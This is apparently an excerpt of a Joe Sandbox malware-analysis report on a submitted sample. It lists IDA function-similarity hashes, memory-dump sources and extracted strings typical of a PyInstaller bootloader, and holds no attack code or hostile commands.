                                                                                                                                                                                            • Instruction ID: edc2005f11eab613eae82776a0b32e2748cce465e4adb30f33cb3c7b4733577c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                                                                                            • Instruction Fuzzy Hash: E551A036B1865386E724DB29C84023EB7A0EF4AF58FA44131EA4C17794CFBAE846C754
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                            • Instruction ID: be7b706059ba5a406ad894799aca7b450c96804f05bc08df33fd6e3e4eda132d
                                                                                                                                                                                            • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                            • Instruction Fuzzy Hash: D3410662F1968B05EB92E9180D047BAE7809F13BA1FD852B4CE9D237C3DF4C2586C361
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastPrivilegeRelease
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1334314998-0
                                                                                                                                                                                            • Opcode ID: 3055bbfcbd61cc8eecc56a6f1cb99aabc05f55128e1d14a3269b82b5b7201aa7
                                                                                                                                                                                            • Instruction ID: 2b5af7e0f645b49d40e74c628e744ecff3bfcab671535f9da8b6b33d900bbfdf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3055bbfcbd61cc8eecc56a6f1cb99aabc05f55128e1d14a3269b82b5b7201aa7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 63410572B14A5A82EF58DF6ADD1416AB3A1FB48FD0B899036EE0D87B54DF7CC0428310
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 661748548992a33f3a500b93372cab8c74f62ef7f3472380e8fefb9c58a103fd
                                                                                                                                                                                            • Instruction ID: 95c98edc75036d423a7516474438a3e086a48a1bda3c23f1c103bbdc22f532a6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 661748548992a33f3a500b93372cab8c74f62ef7f3472380e8fefb9c58a103fd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D31B332B18B8346F724EF266C4013EA6D5AF84B90F944238EA9D53BD5DFBCD4028714
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ea08c2437e4e3c4698eed2d9fd972e66d262d614c61166a858f736d4a7407d73
                                                                                                                                                                                            • Instruction ID: e1b61e455ddf097a5033caab4fb41e0c45a2e1774fedef74812d79b8a846d7ce
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea08c2437e4e3c4698eed2d9fd972e66d262d614c61166a858f736d4a7407d73
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6F06271B182968BDBA89FA9A802629B7D0FB083D0FC08439E68DC3F04D77C90608F14
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: deab79669d35d3f06de2a1b3ba32e81158c273845478c0e398c52fdc0538379a
                                                                                                                                                                                            • Instruction ID: ca12e36d9ce08a20eb65349ffe994de9aaf6d6c4cd158f481908732fafbaf992
                                                                                                                                                                                            • Opcode Fuzzy Hash: deab79669d35d3f06de2a1b3ba32e81158c273845478c0e398c52fdc0538379a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 95A001A1B0A807D4E744AB00AC50020A760AF50381B800032D44D824A09FACA440A321
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                            • API String ID: 190572456-2208601799
                                                                                                                                                                                            • Opcode ID: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                                            • Instruction ID: ff78ad7cba7e5ee8fddc4f775766d2d8fcb6509a612b08d7136cf842a16cd8af
                                                                                                                                                                                            • Opcode Fuzzy Hash: f2a63a6368bd24169675c041ca24025962e4e687bdbe2194ee438000f2696acf
                                                                                                                                                                                            • Instruction Fuzzy Hash: E9E19464B1BB0392FB59BB04BC501B4E3A9AF05790FC45035D80E86AA8FFFCA559D231
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                            • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                                            • Instruction ID: 3f4418b5b375e1d3212bd2c807a4b72101ff0e49c1a433f4dfbb35cb707c0186
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A5109266187A186D7349F26E4181BAF7A1FB98B61F004121EFCF83A85DF7CD045DB10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                            • Opcode ID: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                            • Instruction ID: ec1070ffeb8ffec7f170a2958de0f01b8c05ca7751a9d29f95b88e1f7ba95094
                                                                                                                                                                                            • Opcode Fuzzy Hash: 864902cbb2e935f55fbb0b0f358a3d1305b233c90ffe52d12db1516ed6b7c985
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D12A262F0C14386FB24FA15E8546BBF262FF82754FD44135F689466C4DBBCE4888B68
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                            • Opcode ID: a3039f07d8e4db4acb179ec4d16b477e83be713d16fc67260dd29a37c3e28238
                                                                                                                                                                                            • Instruction ID: 4b66313e9c3465ccc3c137e194943fd9b7970587e1c12ccb49f618bb871c4a80
                                                                                                                                                                                            • Opcode Fuzzy Hash: a3039f07d8e4db4acb179ec4d16b477e83be713d16fc67260dd29a37c3e28238
                                                                                                                                                                                            • Instruction Fuzzy Hash: E9416D21B0968381EB14FB11AC502AAE3A0FF84794FC44432DE4D47A95EFBCF5528720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                            • Opcode ID: 041d502785614f157d9e0dc40e6677f491242ac1b203480cf839ec3ef7e6c674
                                                                                                                                                                                            • Instruction ID: 38007afb56f1f3996a809f2e7d352767327368e9a26c01bcbbf29931cb0ee839
                                                                                                                                                                                            • Opcode Fuzzy Hash: 041d502785614f157d9e0dc40e6677f491242ac1b203480cf839ec3ef7e6c674
                                                                                                                                                                                            • Instruction Fuzzy Hash: 84E1A136B0874A8AEB20EF65D8402ADB7A0FF55798F900135EE8D57B95CF78E490C750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF70126101D), ref: 00007FF7012676CF
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF70126101D), ref: 00007FF70126771F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                            • API String ID: 626452242-27947307
                                                                                                                                                                                            • Opcode ID: 29c5713369a821ffdf206052f52b70c9c71ca66087eebd3ab8d6d8eadb6ef28e
                                                                                                                                                                                            • Instruction ID: ee9bd91fd9a60913aa468012bcb2c65ea59692e98510de07127be0c6d1e125b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 29c5713369a821ffdf206052f52b70c9c71ca66087eebd3ab8d6d8eadb6ef28e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 49418932B09A8381E725EF15B84016AB6A5FF84794F984135DA8D83B94DFBCD051C710
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7012636B9), ref: 00007FF701267BB1
                                                                                                                                                                                              • Part of subcall function 00007FF701262620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF701267774,?,?,?,?,?,?,?,?,?,?,?,00007FF70126101D), ref: 00007FF701262654
                                                                                                                                                                                              • Part of subcall function 00007FF701262620: MessageBoxW.USER32 ref: 00007FF701262730
                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7012636B9), ref: 00007FF701267C25
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                                                            • Opcode ID: aab539b93ffeac37e32982e6298ac4f9f3ab9a0e846f993d4d23bb2dfd97e0ba
                                                                                                                                                                                            • Instruction ID: a0124012513e2eba8ea2eac09d3a34c869cdd66415441864630549ffb909c668
                                                                                                                                                                                            • Opcode Fuzzy Hash: aab539b93ffeac37e32982e6298ac4f9f3ab9a0e846f993d4d23bb2dfd97e0ba
                                                                                                                                                                                            • Instruction Fuzzy Hash: CB214B21B0AB4385EB14EF16FC500B9B6A1EF94B94B984135DA4D83BD9EFBCE551C320
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID: f$p$p
                                                                                                                                                                                            • API String ID: 3215553584-1995029353
                                                                                                                                                                                            • Opcode ID: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                            • Instruction ID: 6f746c28336a60b9471ab5c28dd5758a7578cb22519a3c1b2e8a1db43fd7f135
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b43f30c9b627f105c9440690760d813b6cbc2015482011a3dd154e3df4de9b0
                                                                                                                                                                                            • Instruction Fuzzy Hash: EE128C62B0835386FF24FA15D9542BBF2A5EF40768FC84135E689466C4DBBCE5C0CB24
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                            • API String ID: 626452242-876015163
                                                                                                                                                                                            • Opcode ID: a20b0b5ed8276b533e9075527801bd2e9cd7712b6a2c346206ed433b7f82c893
                                                                                                                                                                                            • Instruction ID: c5c7f1a5057d8a4b95d1d9d00c85ca39ae43de0600863ee83ae7cb92167e3855
                                                                                                                                                                                            • Opcode Fuzzy Hash: a20b0b5ed8276b533e9075527801bd2e9cd7712b6a2c346206ed433b7f82c893
                                                                                                                                                                                            • Instruction Fuzzy Hash: C5416B32B09A4382E720EB15F8401BAB6A5FF94B94F944135DA8D87BE8EF7CD451C720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
